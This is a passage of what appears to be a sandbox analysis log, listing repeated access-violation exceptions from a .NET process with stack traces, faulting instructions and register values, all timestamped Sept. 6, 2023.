0x48539fa registers.esp: 1892836 registers.edi: 1893136 registers.eax: 0 registers.ebp: 1893148 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 37428488 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x4853384 0x4852c1a 0x4852aed 0x4850e13 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893124 registers.edi: 1893468 registers.eax: 0 registers.ebp: 1893132 registers.edx: 0 registers.ebx: 1896372 registers.esi: 37428488 registers.ecx: 38678432	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4852db9 0x4852c1a 0x4852b05 0x4850e13 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892836 registers.edi: 1893136 registers.eax: 0 registers.ebp: 1893148 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 37428488 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x4853384 0x4852c1a 0x4852b05 0x4850e13 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893124 registers.edi: 1893468 registers.eax: 0 registers.ebp: 1893132 registers.edx: 0 registers.ebx: 1896372 registers.esi: 37428488 registers.ecx: 40108608	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4852db9 0x4852c1a 0x4852b05 0x4850e13 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892836 registers.edi: 1893136 registers.eax: 0 registers.ebp: 1893148 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 37428488 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x4853384 0x4852c1a 0x4852b05 0x4850e13 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893124 registers.edi: 1893468 registers.eax: 0 registers.ebp: 1893132 registers.edx: 0 registers.ebx: 1896372 registers.esi: 37428488 registers.ecx: 37683300	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857e98 0x4857ce9 0x4852aed 0x4851662 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892812 registers.edi: 1893112 registers.eax: 0 registers.ebp: 1893124 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485842e 0x4857ce9 0x4852aed 0x4851662 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893100 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893108 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 39227680	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857e98 0x4857ce9 0x4852b05 0x4851662 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892812 registers.edi: 1893112 registers.eax: 0 registers.ebp: 1893124 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485842e 0x4857ce9 0x4852b05 0x4851662 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893100 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893108 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 40647452	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857e98 0x4857ce9 0x4852b05 0x4851662 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892812 registers.edi: 1893112 registers.eax: 0 registers.ebp: 1893124 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x485842e 0x4857ce9 0x4852b05 0x4851662 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893100 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893108 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 41997140	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x48587d2 0x48585e1 0x4852aed 0x485177d 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892864 registers.edi: 1893164 registers.eax: 0 registers.ebp: 1893176 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x4858c3a 0x48585e1 0x4852aed 0x485177d 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4857373 registers.esp: 1893152 registers.edi: 1893492 registers.eax: 0 registers.ebp: 1893160 registers.edx: 0 registers.ebx: 1896372 registers.esi: 36497552 registers.ecx: 37125408	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x48587d2 0x48585e1 0x4852b05 0x485177d 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 50 86 2d 04 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x48539fa registers.esp: 1892864 registers.edi: 1893164 registers.eax: 0 registers.ebp: 1893176 registers.edx: 70091828 registers.ebx: 1896372 registers.esi: 36488564 registers.ecx: 0	1
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x4857330 0x4858c3a 0x48585e1 0x4852b05 0x485177d 0xb1eeb9 0xb1d9ff 0xb17855 0xb16f0b 0xb13c6b 0xb135d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 